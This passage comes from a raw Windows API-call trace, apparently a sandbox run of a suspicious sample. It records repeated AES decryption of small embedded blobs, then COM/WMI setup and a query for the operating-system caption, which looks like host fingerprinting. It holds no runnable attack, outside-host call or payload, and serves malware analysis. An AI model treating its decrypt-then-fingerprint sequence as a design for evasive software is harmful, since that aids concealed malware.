pdwDataLen=0x19f42c | out: pbData=0x23d44b8, pdwDataLen=0x19f42c) returned 0 [0182.528] CryptDestroyKey (hKey=0x5a06d0) returned 1 [0182.528] CryptReleaseContext (hProv=0x587068, dwFlags=0x0) returned 1 [0182.540] CryptReleaseContext (hProv=0x587068, dwFlags=0x0) returned 1 [0182.540] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x587420) returned 1 [0182.541] CryptImportKey (in: hProv=0x587420, pbData=0x23d4628, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a0590) returned 1 [0182.541] CryptContextAddRef (hProv=0x587420, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.542] CryptContextAddRef (hProv=0x587420, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.542] CryptDuplicateKey (in: hKey=0x5a0590, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a07d0) returned 1 [0182.542] CryptContextAddRef (hProv=0x587420, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.543] CryptSetKeyParam (hKey=0x5a07d0, dwParam=0x4, pbData=0x23d4d88*=0x1, dwFlags=0x0) returned 1 [0182.543] CryptSetKeyParam (hKey=0x5a07d0, dwParam=0x1, pbData=0x23d4d54, dwFlags=0x0) returned 1 [0182.543] CryptDecrypt (in: hKey=0x5a07d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d4e68, pdwDataLen=0x19f42c | out: pbData=0x23d4e68, pdwDataLen=0x19f42c) returned 1 [0182.544] CryptDecrypt (in: hKey=0x5a07d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d4eb4, pdwDataLen=0x19f42c | out: pbData=0x23d4eb4, pdwDataLen=0x19f42c) returned 0 [0182.544] CryptDestroyKey (hKey=0x5a0590) returned 1 [0182.544] CryptReleaseContext (hProv=0x587420, dwFlags=0x0) returned 1 [0182.544] CryptReleaseContext (hProv=0x587420, dwFlags=0x0) returned 1 [0182.544] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x587288) returned 1 [0182.545] CryptImportKey (in: hProv=0x587288, pbData=0x23d5040, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a0110) returned 1 [0182.546] CryptContextAddRef (hProv=0x587288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.546] CryptContextAddRef (hProv=0x587288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.546] CryptDuplicateKey (in: hKey=0x5a0110, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a0590) returned 1 [0182.546] CryptContextAddRef (hProv=0x587288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.546] CryptSetKeyParam (hKey=0x5a0590, dwParam=0x4, pbData=0x23d57b0*=0x1, dwFlags=0x0) returned 1 [0182.546] CryptSetKeyParam (hKey=0x5a0590, dwParam=0x1, pbData=0x23d577c, dwFlags=0x0) returned 1 [0182.547] CryptDecrypt (in: hKey=0x5a0590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d5894, pdwDataLen=0x19f3fc | out: pbData=0x23d5894, pdwDataLen=0x19f3fc) returned 1 [0182.547] CryptDecrypt (in: hKey=0x5a0590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d58f4, pdwDataLen=0x19f42c | out: pbData=0x23d58f4, pdwDataLen=0x19f42c) returned 1 [0182.547] CryptDecrypt (in: hKey=0x5a0590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d5940, pdwDataLen=0x19f42c | out: pbData=0x23d5940, pdwDataLen=0x19f42c) returned 0 [0182.547] CryptDestroyKey (hKey=0x5a0110) returned 1 [0182.547] CryptReleaseContext (hProv=0x587288, dwFlags=0x0) returned 1 [0182.547] CryptReleaseContext (hProv=0x587288, dwFlags=0x0) returned 1 [0182.547] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x5874a8) returned 1 [0182.548] CryptImportKey (in: hProv=0x5874a8, pbData=0x23d5b00, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a0150) returned 1 [0182.549] CryptContextAddRef (hProv=0x5874a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.549] CryptContextAddRef (hProv=0x5874a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.549] CryptDuplicateKey (in: hKey=0x5a0150, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a0710) returned 1 [0182.549] CryptContextAddRef (hProv=0x5874a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.549] CryptSetKeyParam (hKey=0x5a0710, dwParam=0x4, pbData=0x23d6270*=0x1, dwFlags=0x0) returned 1 [0182.549] CryptSetKeyParam (hKey=0x5a0710, dwParam=0x1, pbData=0x23d623c, dwFlags=0x0) returned 1 [0182.550] CryptDecrypt (in: hKey=0x5a0710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d6354, pdwDataLen=0x19f3fc | out: pbData=0x23d6354, pdwDataLen=0x19f3fc) returned 1 [0182.550] CryptDecrypt (in: hKey=0x5a0710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d63b4, pdwDataLen=0x19f42c | out: pbData=0x23d63b4, pdwDataLen=0x19f42c) returned 1 [0182.550] CryptDecrypt (in: hKey=0x5a0710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d63f4, pdwDataLen=0x19f42c | out: pbData=0x23d63f4, pdwDataLen=0x19f42c) returned 0 [0182.550] CryptDestroyKey (hKey=0x5a0150) returned 1 [0182.550] CryptReleaseContext (hProv=0x5874a8, dwFlags=0x0) returned 1 [0182.550] CryptReleaseContext (hProv=0x5874a8, dwFlags=0x0) returned 1 [0182.550] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x587530) returned 1 [0182.551] CryptImportKey (in: hProv=0x587530, pbData=0x23d6580, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x5a00d0) returned 1 [0182.551] CryptContextAddRef (hProv=0x587530, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.552] CryptContextAddRef (hProv=0x587530, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.552] CryptDuplicateKey (in: hKey=0x5a00d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x5a05d0) returned 1 [0182.552] CryptContextAddRef (hProv=0x587530, pdwReserved=0x0, dwFlags=0x0) returned 1 [0182.552] CryptSetKeyParam (hKey=0x5a05d0, dwParam=0x4, pbData=0x23d6ce0*=0x1, dwFlags=0x0) returned 1 [0182.553] CryptSetKeyParam (hKey=0x5a05d0, dwParam=0x1, pbData=0x23d6cac, dwFlags=0x0) returned 1 [0182.553] CryptDecrypt (in: hKey=0x5a05d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23d6dc0, pdwDataLen=0x19f42c | out: pbData=0x23d6dc0, pdwDataLen=0x19f42c) returned 1 [0182.553] CryptDecrypt (in: hKey=0x5a05d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23d6e04, pdwDataLen=0x19f42c | out: pbData=0x23d6e04, pdwDataLen=0x19f42c) returned 0 [0182.553] CryptDestroyKey (hKey=0x5a00d0) returned 1 [0182.553] CryptReleaseContext (hProv=0x587530, dwFlags=0x0) returned 1 [0182.553] CryptReleaseContext (hProv=0x587530, dwFlags=0x0) returned 1 [0182.904] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2d8 [0182.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2a8 [0182.927] SetEvent (hEvent=0x2a8) returned 1 [0182.965] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19e514*=0x2d8, lpdwindex=0x19e334 | out: lpdwindex=0x19e334) returned 0x0 [0183.190] CoGetContextToken (in: pToken=0x19e3e0 | out: pToken=0x19e3e0) returned 0x0 [0183.190] CoGetContextToken (in: pToken=0x19e340 | out: pToken=0x19e340) returned 0x0 [0183.190] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x19e410*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19e40c | out: ppvObject=0x19e40c*=0x593398) returned 0x0 [0183.191] WbemDefPath:IUnknown:AddRef (This=0x593398) returned 0x3 [0183.191] WbemDefPath:IUnknown:Release (This=0x593398) returned 0x2 [0183.194] WbemDefPath:IWbemPath:SetText (This=0x593398, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0183.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593398, puCount=0x19ec8c | out: puCount=0x19ec8c*=0x2) returned 0x0 [0183.196] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec88*=0x0, pszText=0x0 | out: puBuffLength=0x19ec88*=0xf, pszText=0x0) returned 0x0 [0183.197] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=4, puBuffLength=0x19ec88*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec88*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0183.246] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19eb38*=0x36c, lpdwindex=0x19e9ec | out: lpdwindex=0x19e9ec) returned 0x0 [0184.845] CoGetContextToken (in: pToken=0x19e8f8 | out: pToken=0x19e8f8) returned 0x0 [0184.846] CoGetContextToken (in: pToken=0x19e8a0 | out: pToken=0x19e8a0) returned 0x0 [0184.846] IUnknown:QueryInterface (in: This=0x580220, riid=0x6cc38724*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e880 | out: ppvObject=0x19e880*=0x580230) returned 0x0 [0184.846] CObjectContext::ContextCallback () returned 0x0 [0184.863] IUnknown:Release (This=0x580230) returned 0x1 [0184.864] CoUnmarshalInterface (in: pStm=0x5bac90, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e8e8 | out: ppv=0x19e8e8*=0x5c52f8) returned 0x0 [0184.864] CoMarshalInterface (pStm=0x5bac90, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5c52f8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0184.865] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e78c | out: ppvObject=0x19e78c*=0x5c52f8) returned 0x0 [0184.865] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e748 | out: ppvObject=0x19e748*=0x0) returned 0x80004002 [0184.884] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0184.972] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e33c | out: ppvObject=0x19e33c*=0x0) returned 0x80004002 [0184.978] WbemLocator:IUnknown:AddRef (This=0x5c52f8) returned 0x3 [0184.978] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e0a4 | out: ppvObject=0x19e0a4*=0x0) returned 0x80004002 [0184.978] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e054 | out: ppvObject=0x19e054*=0x0) returned 0x80004002 [0184.978] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e060 | out: ppvObject=0x19e060*=0x5c5254) returned 0x0 [0184.978] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5c5254, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e068 | out: pCid=0x19e068*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.978] WbemLocator:IUnknown:Release (This=0x5c5254) returned 0x3 [0184.978] CoGetContextToken (in: pToken=0x19e0c0 | out: pToken=0x19e0c0) returned 0x0 [0184.978] IUnknown:QueryInterface (in: This=0x580168, riid=0x6cc04564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e084 | out: ppvObject=0x19e084*=0x580174) returned 0x0 [0184.979] IComThreadingInfo:GetCurrentApartmentType (in: This=0x580174, pAptType=0x19e0c8 | out: pAptType=0x19e0c8*=3) returned 0x0 [0184.979] IUnknown:Release (This=0x580174) returned 0x0 [0184.979] CoGetObjectContext (in: riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5b8d14 | out: ppv=0x5b8d14*=0x580168) returned 0x0 [0184.979] CoGetContextToken (in: pToken=0x19e4c8 | out: pToken=0x19e4c8) returned 0x0 [0184.979] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e558 | out: ppvObject=0x19e558*=0x5c52dc) returned 0x0 [0184.979] WbemLocator:IRpcOptions:Query (in: This=0x5c52dc, pPrx=0x5c52f8, dwProperty=2, pdwValue=0x19e580 | out: pdwValue=0x19e580) returned 0x0 [0184.979] WbemLocator:IUnknown:Release (This=0x5c52dc) returned 0x3 [0184.980] WbemLocator:IUnknown:Release (This=0x5c52f8) returned 0x2 [0184.980] WbemLocator:IUnknown:Release (This=0x5c52f8) returned 0x1 [0184.980] CoGetContextToken (in: pToken=0x19e838 | out: pToken=0x19e838) returned 0x0 [0184.980] WbemLocator:IUnknown:AddRef (This=0x5c52f8) returned 0x2 [0184.981] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eaf0 | out: ppvObject=0x19eaf0*=0x5c52d4) returned 0x0 [0184.981] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5c52d4, pProxy=0x5c52f8, pAuthnSvc=0x19eb40, pAuthzSvc=0x19eb3c, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38, pImpLevel=0x19eb28, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30 | out: pAuthnSvc=0x19eb40*=0xa, pAuthzSvc=0x19eb3c*=0x0, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38*=0x6, pImpLevel=0x19eb28*=0x2, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30*=0x1) returned 0x0 [0184.981] WbemLocator:IUnknown:Release (This=0x5c52d4) returned 0x2 [0184.981] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6c2210f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x5c52f8) returned 0x0 [0184.981] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae0 | out: ppvObject=0x19eae0*=0x5c52d4) returned 0x0 [0184.981] WbemLocator:IClientSecurity:SetBlanket (This=0x5c52d4, pProxy=0x5c52f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.981] WbemLocator:IUnknown:Release (This=0x5c52d4) returned 0x3 [0184.981] WbemLocator:IUnknown:Release (This=0x5c52f8) returned 0x2 [0184.981] CoTaskMemFree (pv=0x5bffd8) [0184.982] WbemLocator:IUnknown:Release (This=0x5c52f8) returned 0x1 [0184.982] SysStringLen (param_1=0x0) returned 0x0 [0184.982] CoGetContextToken (in: pToken=0x19eaa8 | out: pToken=0x19eaa8) returned 0x0 [0184.982] CoGetContextToken (in: pToken=0x19ea08 | out: pToken=0x19ea08) returned 0x0 [0184.982] WbemLocator:IUnknown:QueryInterface (in: This=0x5c52f8, riid=0x19ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ead4 | out: ppvObject=0x19ead4*=0x590540) returned 0x0 [0184.987] WbemLocator:IUnknown:AddRef (This=0x590540) returned 0x3 [0184.987] WbemLocator:IUnknown:Release (This=0x590540) returned 0x2 [0184.987] CoGetContextToken (in: pToken=0x19ea68 | out: pToken=0x19ea68) returned 0x0 [0184.987] WbemLocator:IUnknown:AddRef (This=0x590540) returned 0x3 [0184.988] WbemLocator:IUnknown:QueryInterface (in: This=0x590540, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eaf0 | out: ppvObject=0x19eaf0*=0x5c52d4) returned 0x0 [0184.988] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5c52d4, pProxy=0x590540, pAuthnSvc=0x19eb40, pAuthzSvc=0x19eb3c, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38, pImpLevel=0x19eb28, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30 | out: pAuthnSvc=0x19eb40*=0xa, pAuthzSvc=0x19eb3c*=0x0, pServerPrincName=0x19eb34, pAuthnLevel=0x19eb38*=0x6, pImpLevel=0x19eb28*=0x2, pAuthInfo=0x19eb2c, pCapabilites=0x19eb30*=0x1) returned 0x0 [0184.988] WbemLocator:IUnknown:Release (This=0x5c52d4) returned 0x3 [0184.988] WbemLocator:IUnknown:QueryInterface (in: This=0x590540, riid=0x6c2210f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x5c52f8) returned 0x0 [0184.988] WbemLocator:IUnknown:QueryInterface (in: This=0x590540, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eae0 | out: ppvObject=0x19eae0*=0x5c52d4) returned 0x0 [0184.988] WbemLocator:IClientSecurity:SetBlanket (This=0x5c52d4, pProxy=0x590540, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.989] WbemLocator:IUnknown:Release (This=0x5c52d4) returned 0x4 [0184.989] WbemLocator:IUnknown:Release (This=0x5c52f8) returned 0x3 [0184.989] CoTaskMemFree (pv=0x5c0098) [0184.989] WbemLocator:IUnknown:Release (This=0x590540) returned 0x2 [0184.989] SysStringLen (param_1=0x0) returned 0x0 [0184.989] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0184.989] WbemLocator:IUnknown:AddRef (This=0x590540) returned 0x3 [0184.989] IWbemServices:ExecQuery (in: This=0x590540, strQueryLanguage="WQL", strQuery="SELECT Caption FROM Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x19ebfc | out: ppEnum=0x19ebfc*=0x5be1c0) returned 0x0 [0185.095] IUnknown:QueryInterface (in: This=0x5be1c0, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea48 | out: ppvObject=0x19ea48*=0x5be1c4) returned 0x0 [0185.096] IClientSecurity:QueryBlanket (in: This=0x5be1c4, pProxy=0x5be1c0, pAuthnSvc=0x19ea98, pAuthzSvc=0x19ea94, pServerPrincName=0x19ea8c, pAuthnLevel=0x19ea90, pImpLevel=0x19ea80, pAuthInfo=0x19ea84, pCapabilites=0x19ea88 | out: pAuthnSvc=0x19ea98*=0xa, pAuthzSvc=0x19ea94*=0x0, pServerPrincName=0x19ea8c, pAuthnLevel=0x19ea90*=0x6, pImpLevel=0x19ea80*=0x2, pAuthInfo=0x19ea84, pCapabilites=0x19ea88*=0x1) returned 0x0 [0185.096] IUnknown:Release (This=0x5be1c4) returned 0x1 [0185.096] IUnknown:QueryInterface (in: This=0x5be1c0, riid=0x6c2210f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x5efcb8) returned 0x0 [0185.096] IUnknown:QueryInterface (in: This=0x5be1c0, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea38 | out: ppvObject=0x19ea38*=0x5be1c4) returned 0x0 [0185.096] IClientSecurity:SetBlanket (This=0x5be1c4, pProxy=0x5be1c0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0185.166] IUnknown:Release (This=0x5be1c4) returned 0x2 [0185.166] WbemLocator:IUnknown:Release (This=0x5efcb8) returned 0x1 [0185.166] CoTaskMemFree (pv=0x5c0128) [0185.166] IUnknown:QueryInterface (in: This=0x5be1c0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e634 | out: ppvObject=0x19e634*=0x5efcb8) returned 0x0 [0185.166] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e5f0 | out: ppvObject=0x19e5f0*=0x0) returned 0x80004002 [0185.171] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e40c | out: ppvObject=0x19e40c*=0x0) returned 0x80004002 [0185.173] IUnknown:QueryInterface (in: This=0x5be1c0, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e1e4 | out: ppvObject=0x19e1e4*=0x0) returned 0x80004002 [0185.178] WbemLocator:IUnknown:AddRef (This=0x5efcb8) returned 0x3 [0185.178] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19df4c | out: ppvObject=0x19df4c*=0x0) returned 0x80004002 [0185.178] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19defc | out: ppvObject=0x19defc*=0x0) returned 0x80004002 [0185.178] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19df08 | out: ppvObject=0x19df08*=0x5efc14) returned 0x0 [0185.179] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5efc14, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19df10 | out: pCid=0x19df10*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.179] WbemLocator:IUnknown:Release (This=0x5efc14) returned 0x3 [0185.179] CoGetContextToken (in: pToken=0x19df68 | out: pToken=0x19df68) returned 0x0 [0185.179] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0185.179] WbemLocator:IUnknown:QueryInterface (in: This=0x5efcb8, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 